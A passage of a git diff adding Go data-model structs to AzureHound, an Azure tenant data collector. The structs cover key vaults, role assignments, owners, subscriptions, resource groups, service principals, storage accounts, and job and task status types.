`json:"type"` + Version int `json:"version"` + Count int `json:"count"` +} diff --git a/models/job.go b/models/job.go new file mode 100644 index 0000000..e562e7c --- /dev/null +++ b/models/job.go @@ -0,0 +1,62 @@ +package models + +import "time" + +type CompleteJobRequest struct { + Status string `json:"status"` + StatusEnum JobStatus `json:"-"` + Message string `json:"message"` +} + +type JobStatus int + +const ( + JobStatusInvalid JobStatus = -1 + JobStatusReady JobStatus = 0 + JobStatusRunning JobStatus = 1 + JobStatusComplete JobStatus = 2 + JobStatusCanceled JobStatus = 3 + JobStatusTimedOut JobStatus = 4 + JobStatusFailed JobStatus = 5 + JobStatusIngesting JobStatus = 6 +) + +func (s JobStatus) String() string { + switch s { + case JobStatusReady: + return "READY" + + case JobStatusRunning: + return "RUNNING" + + case JobStatusComplete: + return "COMPLETE" + + case JobStatusCanceled: + return "CANCELED" + + case JobStatusTimedOut: + return "TIMEDOUT" + + case JobStatusFailed: + return "FAILED" + + case JobStatusIngesting: + return "INGESTING" + + default: + return "INVALIDSTATUS" + } +} + +type ClientJob struct { + ID int `json:"id"` + ClientID string `json:"client_id"` + ClientName string `json:"client_name"` + ClientScheduleID int `json:"event_id"` + ExecutionTime time.Time `json:"execution_time"` + StartTime time.Time `json:"start_time"` + EndTime time.Time `json:"end_time"` + Status JobStatus `json:"status"` + StatusMessage string `json:"status_message"` +} diff --git a/models/key-vault-access-policy.go b/models/key-vault-access-policy.go new file mode 100644 index 0000000..ff558ea --- /dev/null +++ b/models/key-vault-access-policy.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type KeyVaultAccessPolicy struct { + azure.AccessPolicyEntry + KeyVaultId string `json:"keyVaultId"` +} diff --git a/models/key-vault-contributor.go b/models/key-vault-contributor.go new file mode 100644 index 0000000..c952ff1 --- /dev/null +++ b/models/key-vault-contributor.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type KeyVaultContributor struct { + Contributor azure.RoleAssignment `json:"contributor"` + KeyVaultId string `json:"keyVaultId"` +} + +type KeyVaultContributors struct { + Contributors []KeyVaultContributor `json:"contributors"` + KeyVaultId string `json:"keyVaultId"` +} diff --git a/models/key-vault-kvcontributor.go b/models/key-vault-kvcontributor.go new file mode 100644 index 0000000..8cefbba --- /dev/null +++ b/models/key-vault-kvcontributor.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type KeyVaultKVContributor struct { + KVContributor azure.RoleAssignment `json:"kvContributor"` + KeyVaultId string `json:"keyVaultId"` +} + +type KeyVaultKVContributors struct { + KVContributors []KeyVaultKVContributor `json:"kvContributors"` + KeyVaultId string `json:"keyVaultId"` +} diff --git a/models/key-vault-owner.go b/models/key-vault-owner.go new file mode 100644 index 0000000..4fec73a --- /dev/null +++ b/models/key-vault-owner.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type KeyVaultOwner struct { + Owner azure.RoleAssignment `json:"owner"` + KeyVaultId string `json:"keyVaultId"` +} + +type KeyVaultOwners struct { + Owners []KeyVaultOwner `json:"owners"` + KeyVaultId string `json:"keyVaultId"` +} diff --git a/models/key-vault-role-assignment.go b/models/key-vault-role-assignment.go new file mode 100644 index 0000000..2d9700f --- /dev/null +++ b/models/key-vault-role-assignment.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type KeyVaultRoleAssignment struct { + RoleAssignment azure.RoleAssignment `json:"roleAssignment"` + KeyVaultId string `json:"virtualMachineId"` +} + +type KeyVaultRoleAssignments struct { + RoleAssignments []KeyVaultRoleAssignment `json:"roleAssignments"` + KeyVaultId string `json:"virtualMachineId"` +} diff --git a/models/key-vault-user-access-admin.go b/models/key-vault-user-access-admin.go new file mode 100644 index 0000000..5a413f9 --- /dev/null +++ b/models/key-vault-user-access-admin.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type KeyVaultUserAccessAdmin struct { + UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"` + KeyVaultId string `json:"keyVaultId"` +} + +type KeyVaultUserAccessAdmins struct { + UserAccessAdmins []KeyVaultUserAccessAdmin `json:"userAccessAdmins"` + KeyVaultId string `json:"keyVaultId"` +} diff --git a/models/key-vault.go b/models/key-vault.go new file mode 100644 index 0000000..cadefd1 --- /dev/null +++ b/models/key-vault.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type KeyVault struct { + azure.KeyVault + SubscriptionId string `json:"subscriptionId"` + ResourceGroup string `json:"resourceGroup"` + TenantId string `json:"tenantId"` +} diff --git a/models/logic-app.go b/models/logic-app.go new file mode 100644 index 0000000..dbe83eb --- /dev/null +++ b/models/logic-app.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type LogicApp struct { + azure.LogicApp + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/models/managed-cluster.go b/models/managed-cluster.go new file mode 100644 index 0000000..62b9bee --- /dev/null +++ b/models/managed-cluster.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type ManagedCluster struct { + azure.ManagedCluster + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + TenantId string `json:"tenantId"` +} diff --git a/models/management-group-owner.go b/models/management-group-owner.go new file mode 100644 index 0000000..78aab80 --- /dev/null +++ b/models/management-group-owner.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type ManagementGroupOwner struct { + Owner azure.RoleAssignment `json:"owner"` + ManagementGroupId string `json:"managementGroupId"` +} + +type ManagementGroupOwners struct { + Owners []ManagementGroupOwner `json:"owners"` + ManagementGroupId string `json:"managementGroupId"` +} diff --git a/models/management-group-role-assignment.go b/models/management-group-role-assignment.go new file mode 100644 index 0000000..b9bceec --- /dev/null +++ b/models/management-group-role-assignment.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type ManagementGroupRoleAssignment struct { + RoleAssignment azure.RoleAssignment `json:"roleAssignment"` + ManagementGroupId string `json:"managementGroupId"` +} + +type ManagementGroupRoleAssignments struct { + RoleAssignments []ManagementGroupRoleAssignment `json:"roleAssignments"` + ManagementGroupId string `json:"managementGroupId"` +} diff --git a/models/management-group-user-access-admin.go b/models/management-group-user-access-admin.go new file mode 100644 index 0000000..7b26964 --- /dev/null +++ b/models/management-group-user-access-admin.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type ManagementGroupUserAccessAdmin struct { + UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"` + ManagementGroupId string `json:"managementGroupId"` +} + +type ManagementGroupUserAccessAdmins struct { + UserAccessAdmins []ManagementGroupUserAccessAdmin `json:"userAccessAdmins"` + ManagementGroupId string `json:"managementGroupId"` +} diff --git a/models/mgmt-group.go b/models/mgmt-group.go new file mode 100644 index 0000000..17de25e --- /dev/null +++ b/models/mgmt-group.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type ManagementGroup struct { + azure.ManagementGroup + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/resource-group-owner.go b/models/resource-group-owner.go new file mode 100644 index 0000000..31bfbb7 --- /dev/null +++ b/models/resource-group-owner.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type ResourceGroupOwner struct { + Owner azure.RoleAssignment `json:"owner"` + ResourceGroupId string `json:"resourceGroupId"` +} + +type ResourceGroupOwners struct { + Owners []ResourceGroupOwner `json:"owners"` + ResourceGroupId string `json:"resourceGroupId"` +} diff --git a/models/resource-group-role-assignment.go b/models/resource-group-role-assignment.go new file mode 100644 index 0000000..3db7b63 --- /dev/null +++ b/models/resource-group-role-assignment.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type ResourceGroupRoleAssignment struct { + RoleAssignment azure.RoleAssignment `json:"roleAssignment"` + ResourceGroupId string `json:"resourceGroupId"` +} + +type ResourceGroupRoleAssignments struct { + RoleAssignments []ResourceGroupRoleAssignment `json:"roleAssignments"` + ResourceGroupId string `json:"resourceGroupId"` +} diff --git a/models/resource-group-user-access-admin.go b/models/resource-group-user-access-admin.go new file mode 100644 index 0000000..3751f9f --- /dev/null +++ b/models/resource-group-user-access-admin.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type ResourceGroupUserAccessAdmin struct { + UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"` + ResourceGroupId string `json:"resourceGroupId"` +} + +type ResourceGroupUserAccessAdmins struct { + UserAccessAdmins []ResourceGroupUserAccessAdmin `json:"userAccessAdmins"` + ResourceGroupId string `json:"resourceGroupId"` +} diff --git a/models/resource-group.go b/models/resource-group.go new file mode 100644 index 0000000..fa2bb67 --- /dev/null +++ b/models/resource-group.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type ResourceGroup struct { + azure.ResourceGroup + SubscriptionId string `json:"subscriptionId"` + TenantId string `json:"tenantId"` +} diff --git a/models/role-assignments.go b/models/role-assignments.go new file mode 100644 index 0000000..ad93799 --- /dev/null +++ b/models/role-assignments.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type RoleAssignments struct { + RoleAssignments []azure.UnifiedRoleAssignment `json:"roleAssignments"` + RoleDefinitionId string `json:"roleDefinitionId"` + TenantId string `json:"tenantId"` +} diff --git a/models/role.go b/models/role.go new file mode 100644 index 0000000..71750e7 --- /dev/null +++ b/models/role.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type Role struct { + azure.Role + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/service-principal-owner.go b/models/service-principal-owner.go new file mode 100644 index 0000000..bb44eb0 --- /dev/null +++ b/models/service-principal-owner.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "encoding/json" +) + +type ServicePrincipalOwner struct { + Owner json.RawMessage `json:"owner"` + ServicePrincipalId string `json:"servicePrincipalId"` +} + +func (s *ServicePrincipalOwner) MarshalJSON() ([]byte, error) { + output := make(map[string]any) + output["servicePrincipalId"] = s.ServicePrincipalId + + if owner, err := OmitEmpty(s.Owner); err != nil { + return nil, err + } else { + output["owner"] = owner + return json.Marshal(output) + } +} + +type ServicePrincipalOwners struct { + Owners []ServicePrincipalOwner `json:"owners"` + ServicePrincipalId string `json:"servicePrincipalId"` +} diff --git a/models/service-principal.go b/models/service-principal.go new file mode 100644 index 0000000..61a6977 --- /dev/null +++ b/models/service-principal.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type ServicePrincipal struct { + azure.ServicePrincipal + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/storage-account.go b/models/storage-account.go new file mode 100644 index 0000000..ff73499 --- /dev/null +++ b/models/storage-account.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type StorageAccount struct { + azure.StorageAccount + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/models/storage-container.go b/models/storage-container.go new file mode 100644 index 0000000..807610c --- /dev/null +++ b/models/storage-container.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type StorageContainer struct { + azure.StorageContainer + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + StorageAccountId string `json:"storageAccountId"` + TenantId string `json:"tenantId"` +} diff --git a/models/subscription-owner.go b/models/subscription-owner.go new file mode 100644 index 0000000..2e2f22b --- /dev/null +++ b/models/subscription-owner.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type SubscriptionOwner struct { + Owner azure.RoleAssignment `json:"owner"` + SubscriptionId string `json:"subscriptionId"` +} + +type SubscriptionOwners struct { + Owners []SubscriptionOwner `json:"owners"` + SubscriptionId string `json:"subscriptionId"` +} diff --git a/models/subscription-role-assignment.go b/models/subscription-role-assignment.go new file mode 100644 index 0000000..4505273 --- /dev/null +++ b/models/subscription-role-assignment.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type SubscriptionRoleAssignment struct { + RoleAssignment azure.RoleAssignment `json:"roleAssignment"` + SubscriptionId string `json:"subscriptionId"` +} + +type SubscriptionRoleAssignments struct { + RoleAssignments []SubscriptionRoleAssignment `json:"roleAssignments"` + SubscriptionId string `json:"subscriptionId"` +} diff --git a/models/subscription-user-access-admin.go b/models/subscription-user-access-admin.go new file mode 100644 index 0000000..f4be7e8 --- /dev/null +++ b/models/subscription-user-access-admin.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type SubscriptionUserAccessAdmin struct { + UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"` + SubscriptionId string `json:"subscriptionId"` +} + +type SubscriptionUserAccessAdmins struct { + UserAccessAdmins []SubscriptionUserAccessAdmin `json:"userAccessAdmins"` + SubscriptionId string `json:"subscriptionId"` +} diff --git a/models/subscription.go b/models/subscription.go new file mode 100644 index 0000000..ac841a4 --- /dev/null +++ b/models/subscription.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type Subscription struct { + azure.Subscription + TenantId string `json:"tenantId"` +} diff --git a/models/task.go b/models/task.go new file mode 100644 index 0000000..69614ad --- /dev/null +++ b/models/task.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "time" + +type ClientTask struct { + ADStructureCollection bool `json:"ad_structure_collection"` + ClientId string `json:"client_id"` + CreatedAt time.Time `json:"created_at"` + DomainController string `json:"domain_controller"` + EndTime time.Time `json:"end_time"` + EventId int `json:"event_id"` + EventTitle string `json:"event_title"` + ExectionTime time.Time `json:"exection_time"` + Id int `json:"id"` + LocalGroupCollection bool `json:"local_group_collection"` + LogPath string `json:"log_path"` + SessionCollection bool `json:"session_collection"` + StartTime time.Time `json:"start_time"` + Status int `json:"status"` + UpdatedAt time.Time `json:"updated_at"` +} diff --git a/models/tenant.go b/models/tenant.go new file mode 100644 index 0000000..7fed704 --- /dev/null +++ b/models/tenant.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type Tenant struct { + azure.Tenant + Collected bool `json:"collected,omitempty"` +} diff --git a/models/update-client-request.go b/models/update-client-request.go new file mode 100644 index 